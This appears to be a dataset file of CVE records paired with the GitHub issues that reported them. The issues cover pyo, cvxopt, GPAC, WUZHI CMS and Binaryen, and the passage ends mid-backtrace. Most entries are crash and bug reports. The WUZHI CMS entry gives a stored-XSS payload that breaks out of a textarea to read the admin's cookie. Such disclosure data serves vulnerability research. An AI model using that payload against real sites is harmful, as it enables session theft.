cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2021-41499
2021-12-17T21:15:07.740
Buffer Overflow Vulnerability exists in ajaxsoundstudio.com n Pyo < 1.03 in the Server_debug function, which allows remote attackers to conduct DoS attacks by deliberately passing on an overlong audio file name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/belangeo/pyo/issues/222" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/belangeo/pyo/issues/222" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pyo_project:pyo:*:*:*:*:*:*:*:*", "matchCriteriaId": "DBFD19B6-2D7C-415D-823C-0627D116B27D", "versionEndExcluding": "1.03", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/belangeo/pyo/issues/222
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "belangeo", "pyo" ]
### Code snippet ``` Server_start_rec_internal(Server *self, char *filename) { ................. Server_debug(self, "Recording filename path = %s\n", filename); ----> filename comes from external module, the length is indeterminate if (! (self->recfile = sf_open(filename, SFM_WRITE, &self->recinfo))) { Server_error(self, "Not able to open output file %s.\n", filename); ----> filename comes from external module, the length is indeterminate Server_debug(self, "%s\n", sf_strerror(self->recfile)); return -1; } ................. } Server_debug(Server *self, char * format, ...) { if (self->verbosity & 8) { char buffer[256]; va_list args; va_start (args, format); vsprintf (buffer, format, args); -----> Variable parameters may lead to write overflow in buffer va_end (args); PySys_WriteStdout("Pyo debug: %s", buffer); } } ``` ### Description **Function**: Server_debug **File**: servermodule.c **Call-path**: recstart (Python) -> Server_start_rec -> Server_start_rec_internal -> Server_debug **WarningType**: Write-overflow. Our analysis tool reported a warning at vsprintf in Server_debug. As buffer is a fixed size stack variable, when the debug mode is open, vsprintf may cause write overflow with no boundary check especially when the inputs depended on external modules (e.g., Python). Also seen in [Details](https://github.com/Daybreak2019/IssueReport/blob/master/Pyo/case-035.png)
Insecure function vsprintf may cause write-overflow in function Server_debug
https://api.github.com/repos/belangeo/pyo/issues/222/comments
3
2021-05-27T06:14:03Z
2021-06-14T00:44:45Z
https://github.com/belangeo/pyo/issues/222
903,262,717
222
2,879
CVE-2021-41500
2021-12-17T21:15:07.777
Incomplete string comparison vulnerability exits in cvxopt.org cvxop <= 1.2.6 in APIs (cvxopt.cholmod.diag, cvxopt.cholmod.getfactor, cvxopt.cholmod.solve, cvxopt.cholmod.spsolve), which allows attackers to conduct Denial of Service attacks by construct fake Capsule objects.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cvxopt/cvxopt/issues/193" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CXTPM3DGVYTYQ54OFCMXZVWVOMR7JM2D/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cvxopt/cvxopt/issues/193" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CXTPM3DGVYTYQ54OFCMXZVWVOMR7JM2D/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cvxopt_project:cvxopt:*:*:*:*:*:python:*:*", "matchCriteriaId": "09087B40-5FE5-41EC-9F26-55F2FE4B4575", "versionEndExcluding": null, "versionEndIncluding": "1.2.6", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "697" ]
697
https://github.com/cvxopt/cvxopt/issues/193
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cvxopt", "cvxopt" ]
### Code snippet ``` static PyObject* solve(PyObject *self, PyObject *args, PyObject *kwrds) { ............ if (!PyArg_ParseTupleAndKeywords(args, kwrds, "OO|iiii", kwlist, &F, &B, &sys, &nrhs, &ldB, &oB)) return NULL; #if PY_MAJOR_VERSION >= 3 if (!PyCapsule_CheckExact(F) || !(descr = PyCapsule_GetName(F))) err_CO("F"); if (strncmp(descr, "CHOLMOD FACTOR", 14)) -------> The string terminator is not considered. PY_ERR_TYPE("F is not a CHOLMOD factor"); cholmod_factor *L = (cholmod_factor *) PyCapsule_GetPointer(F, descr); #else if (!PyCObject_Check(F)) err_CO("F"); descr = PyCObject_GetDesc(F); if (!descr || strncmp(descr, "CHOLMOD FACTOR", 14)) -------> The string terminator is not considered. PY_ERR_TYPE("F is not a CHOLMOD factor"); cholmod_factor *L = (cholmod_factor *) PyCObject_AsVoidPtr(F); #endif ............ ``` ### Description **Function**: solve/spsolve/diag/getfactor **Call-path**: 1. solve (Python) -> solve -> strncmp 2. spsolve (Python) -> spsolve -> strncmp 3. diag(Python) -> diag -> strncmp 4. getfactor(Python) -> getfactor-> strncmp **WarningType**: Incomplete comparison. Out analysis tool reported four warnings about the incomplete comparison of strings as shown above. When the comparison length is 14, the terminator would be ignored. Hence even the strncmp returns 0, the reality may not match expectations specifically when variable descr depends on external inputs (Python). For example, descr = "CHOLMOD FACTORMalicious", the comparison still return 0. Also seen in [solve](https://github.com/Daybreak2019/IssueReport/blob/master/Cvxopt/case-003.png), [spsolve](https://github.com/Daybreak2019/IssueReport/blob/master/Cvxopt/case-003-1.png), [diag](https://github.com/Daybreak2019/IssueReport/blob/master/Cvxopt/case-003-2.png) and [getfactor](https://github.com/Daybreak2019/IssueReport/blob/master/Cvxopt/case-003-3.png)
Incomplete comparison with function strncmp
https://api.github.com/repos/cvxopt/cvxopt/issues/193/comments
4
2021-05-27T07:26:26Z
2021-09-20T10:01:22Z
https://github.com/cvxopt/cvxopt/issues/193
903,324,402
193
2,880
CVE-2021-45288
2021-12-21T17:15:08.630
A Double Free vulnerability exists in filedump.c in GPAC 1.0.1, which could cause a Denail of Service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1956" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1956" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/gpac/gpac/issues/1956
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1527-g6fcf9819e-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-mp4box --prefix=/home/zxq/CVE_testing/sourceproject/gpac/cmakebuild --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04) **command:** ``` ./bin/gcc/MP4Box -bt POC ``` [POC.zip](https://github.com/gpac/gpac/files/7690783/POC.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Not enough bytes (10) to read descriptor (size=127) [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 75 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [ODF] Not enough bytes (10) to read descriptor (size=127) [ODF] Error reading descriptor (tag 4 size 21): Invalid MPEG-4 Descriptor [iso file] Incomplete box mdat - start 11495 size 75 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [MP4 Loading] Unable to fetch sample 1 from track ID 7 - aborting track import free(): double free detected in tcache 2 [3] 3698317 abort ./bin/gcc/MP4Box -bt ``` **gdb information:** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff5654740 (0x00007ffff5654740) RCX: 0x7ffff61d118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff6fd0 --> 0x0 RDI: 0x2 RBP: 0x7fffffff7320 --> 0x7ffff6376b80 --> 0x0 RSP: 0x7fffffff6fd0 --> 0x0 RIP: 0x7ffff61d118b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff6fd0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffff7240 --> 0x0 R13: 0x10 R14: 0x7ffff7ffb000 --> 0x6565726600001000 R15: 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff61d117f <__GI_raise+191>: mov edi,0x2 0x7ffff61d1184 <__GI_raise+196>: mov eax,0xe 0x7ffff61d1189 <__GI_raise+201>: syscall => 0x7ffff61d118b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff61d1193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff61d119c <__GI_raise+220>: jne 0x7ffff61d11c4 <__GI_raise+260> 0x7ffff61d119e <__GI_raise+222>: mov eax,r8d 0x7ffff61d11a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff6fd0 --> 0x0 0008| 0x7fffffff6fd8 --> 0x0 0016| 0x7fffffff6fe0 --> 0x7ffff6b0ffca (<Media_GetESD+842>: mov rax,QWORD PTR [rsp+0x10]) 0024| 0x7fffffff6fe8 --> 0x0 0032| 0x7fffffff6ff0 --> 0x1 0040| 0x7fffffff6ff8 --> 0x0 0048| 0x7fffffff7000 --> 0x5555556709a0 --> 0x80003 0056| 0x7fffffff7008 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff61b0859 in __GI_abort () at abort.c:79 #2 0x00007ffff621b3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff6345285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff622347c in malloc_printerr (str=str@entry=0x7ffff63475d0 "free(): double free detected in tcache 2") at malloc.c:5347 #4 0x00007ffff62250ed in _int_free (av=0x7ffff6376b80 <main_arena>, p=0x555555671790, have_lock=0x0) at malloc.c:4201 #5 0x00007ffff6bf30f5 in gf_odf_del_default () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff6f56654 in gf_sm_load_run_isom () from /home/zxq/CVE_testing/project/gpac/bin/gcc/libgpac.so.10 #7 0x00005555555c3a18 in dump_isom_scene (file=<optimized out>, inName=0x555555644d20 <outfile> "../../result/gpac/afl-outbox-bt-d/crashes/id:000000,sig:06,src:000181,op:havoc,rep:64", is_final_name=GF_FALSE, dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at filedump.c:199 #8 0x000055555559edd0 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:6044 #9 0x00007ffff61b20b3 in __libc_start_main (main=0x55555556d540 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #10 0x000055555556d5be in _start () at main.c:6496 gdb-peda$ '''
Double Free in filedump.c:199
https://api.github.com/repos/gpac/gpac/issues/1956/comments
0
2021-12-10T07:28:18Z
2021-12-10T10:01:22Z
https://github.com/gpac/gpac/issues/1956
1,076,525,998
1,956
2,881
CVE-2020-19770
2021-12-21T18:15:07.683
A cross-site scripting (XSS) vulnerability in the system bulletin component of WUZHI CMS v4.1.0 allows attackers to steal the admin's cookie.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/180" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/180" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhi_cms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4749403-9C42-40DF-A695-A9E31BD37D84", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wuzhicms/wuzhicms/issues/180
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
This XSS vulnerability was found in the system bulletin(系统公告) in the background. **payload:** > </textarea>\<details open="" ontoggle=alert(document.cookie)>\<textarea> First we can write payload with a low-privileged user named 'test'.As an attacker, you can change a title to prompt an administrator to click on this page. ![alt](https://raw.githubusercontent.com/loong716/loong716.github.io/master/img/muzhi_xss1.PNG) Then log in to the admin account and click the change(修改) button to pop up the admin's cookie. ![alt](https://raw.githubusercontent.com/loong716/loong716.github.io/master/img/muzhi_xss2.png) ![alt](https://raw.githubusercontent.com/loong716/loong716.github.io/master/img/muzhi_xss3.PNG) The reason for the vulnerability is that php code uses blacklists to filter JS code, resulting in poor filtering. This method can be used to steal admin's cookie.
A stored XSS vulnerability in WUZHI CMS v4.1.0
https://api.github.com/repos/wuzhicms/wuzhicms/issues/180/comments
0
2019-07-09T09:39:41Z
2019-07-09T09:44:26Z
https://github.com/wuzhicms/wuzhicms/issues/180
465,678,199
180
2,882
CVE-2021-45290
2021-12-21T18:15:08.220
A Denial of Service vulnerability exits in Binaryen 103 due to an assertion abort in wasm::handle_unreachable.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4383" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKGCHPS7UAIOOBGSXDJAUFE5CROTTF6J/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCWLB4PWYQO55F7IGNC7KUYN2MFZE3JP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/binaryen/issues/4383" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UKGCHPS7UAIOOBGSXDJAUFE5CROTTF6J/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YCWLB4PWYQO55F7IGNC7KUYN2MFZE3JP/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:binaryen:103:*:*:*:*:*:*:*", "matchCriteriaId": "851AA3FC-CFB5-4A99-A10C-830974545702", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/WebAssembly/binaryen/issues/4383
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "WebAssembly", "binaryen" ]
**Version:** ``` version_103 ``` **System information** Ubuntu 20.04.1 LTS, clang version 10.0.0-4ubuntu1 **command:** ``` ./wasm-opt POC1 ``` [POC1.zip](https://github.com/WebAssembly/binaryen/files/7695646/POC1.zip) **Result** ``` 2492902 abort ``` **GDB information** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff6d4afc0 (0x00007ffff6d4afc0) RCX: 0x7ffff6d9518b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffb640 --> 0x0 RDI: 0x2 RBP: 0x7fffffffb8b0 --> 0x7fffffffb8c0 --> 0x7fffffffb8e0 --> 0x7fffffffb930 --> 0x7fffffffb9a0 --> 0x7fffffffb9d0 (--> ...) RSP: 0x7fffffffb640 --> 0x0 RIP: 0x7ffff6d9518b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffb640 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff72ad360 --> 0x7ffff72a73d0 --> 0x7ffff7200400 (<_ZNSoD1Ev>: endbr64) R13: 0x7ffff72ad360 --> 0x7ffff72a73d0 --> 0x7ffff7200400 (<_ZNSoD1Ev>: endbr64) R14: 0x7fffffffccc0 --> 0x555555666f40 --> 0x0 R15: 0x555555656610 ("label$28") EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6d9517f <__GI_raise+191>: mov edi,0x2 0x7ffff6d95184 <__GI_raise+196>: mov eax,0xe 0x7ffff6d95189 <__GI_raise+201>: syscall => 0x7ffff6d9518b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff6d95193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff6d9519c <__GI_raise+220>: jne 0x7ffff6d951c4 <__GI_raise+260> 0x7ffff6d9519e <__GI_raise+222>: mov eax,r8d 0x7ffff6d951a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffb640 --> 0x0 0008| 0x7fffffffb648 --> 0x7fffffffca00 --> 0x7fffffffd160 --> 0x0 0016| 0x7fffffffb650 --> 0x7fffffffca00 --> 0x7fffffffd160 --> 0x0 0024| 0x7fffffffb658 --> 0x7fffffffca00 --> 0x7fffffffd160 --> 0x0 0032| 0x7fffffffb660 --> 0x0 0040| 0x7fffffffb668 --> 0x55555568bdc0 ("label$53") 0048| 0x7fffffffb670 --> 0x7fffffffb6f0 --> 0xffffffffffffffff 0056| 0x7fffffffb678 --> 0x7ffff7be8775 (<_ZN4wasm17WasmBinaryBuilder13popExpressionEv+85>: test al,al) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff6d74859 in __GI_abort () at abort.c:79 #2 0x00007ffff7d3ee48 in wasm::handle_unreachable(char const*, char const*, unsigned int) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #3 0x00007ffff7c84557 in wasm::Type::getHeapType() const () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #4 0x00007ffff7bd6a9c in wasm::BrOn::getSentType() () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #5 0x00007ffff789c965 in wasm::BranchUtils::operateOnScopeNameUsesAndSentTypes<wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1}>(wasm::Expression*, wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1})::{lambda(wasm::Name&)#1}::operator()(wasm::Name&) const () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #6 0x00007ffff789ca9d in void wasm::BranchUtils::operateOnScopeNameUses<wasm::BranchUtils::operateOnScopeNameUsesAndSentTypes<wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1}>(wasm::Expression*, wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1})::{lambda(wasm::Name&)#1}>(wasm::Expression*, wasm::BranchUtils::BranchSeeker::visitExpression(wasm::Expression*)::{lambda(wasm::Name&, wasm::Type)#1}) () from /home/zxq/CVE_testing/sourceproject/binaryen/bin/../lib/libbinaryen.so #7 0x00007ffff789d22c in 